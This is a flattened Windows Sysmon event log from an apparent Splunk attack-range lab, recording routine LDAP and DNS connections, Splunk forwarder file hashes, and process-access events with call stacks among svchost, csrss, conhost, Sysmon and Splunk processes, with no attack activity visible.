AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local65529-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000294527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:46.326{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E941A82F1AD3C73272855DA0E30B217,SHA256=916C857CDA5C5250C32EFC8D4CEDB32BC216C5013F5EA0580983189BF6C70C73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.443{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59409- 23542300x8000000000000000294535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:47.858{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0008A264E34E5442A1CC52B9C8BF16,SHA256=3D1649864E8F4332653E61BD8C6B4784B7519C8665E7D7979F984686A1DDF800,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1457-6216-B004-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1457-6216-B004-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.723{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1457-6216-B004-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.724{4F8D34B0-1457-6216-B004-000000003902}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000218775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.442{4F8D34B0-1457-6216-AF04-000000003902}10401052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1457-6216-AF04-000000003902}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:47.223{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1457-6216-AF04-000000003902}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 